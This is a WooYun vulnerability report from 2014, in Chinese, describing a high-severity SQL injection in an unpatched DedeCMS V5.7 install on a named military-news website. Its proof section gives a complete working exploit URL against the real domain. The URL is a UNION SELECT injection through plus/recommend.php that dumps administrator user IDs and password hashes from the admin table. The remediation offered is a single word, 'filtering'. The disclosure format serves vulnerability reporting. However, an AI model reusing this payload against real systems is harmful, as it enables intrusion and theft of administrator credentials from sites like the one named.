当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080109

漏洞标题:中国第一军事网某系统未升级导致高危sql注射

相关厂商:第一军事

漏洞作者: 路人甲

提交时间:2014-10-21 11:44

修复时间:2014-12-05 11:46

公开时间:2014-12-05 11:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中国第一军事网某系统未升级导致高危sql注射

详细说明:

中国第一军事网某系统未升级导致高危sql注射

漏洞证明:

DedeCMSV57_UTF8_SP1 系统未升级,存在sql注射

http://www.junqing123.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%[email protected]%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat%280x3C6162633E,group_concat%280x7C,userid,0x3a,pwd,0x7C%29,0x3C2F6162633E%29,5,6,7,8,9%20from%20%60%[email protected]__admin%60%23


40.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:2 (WooYun评价)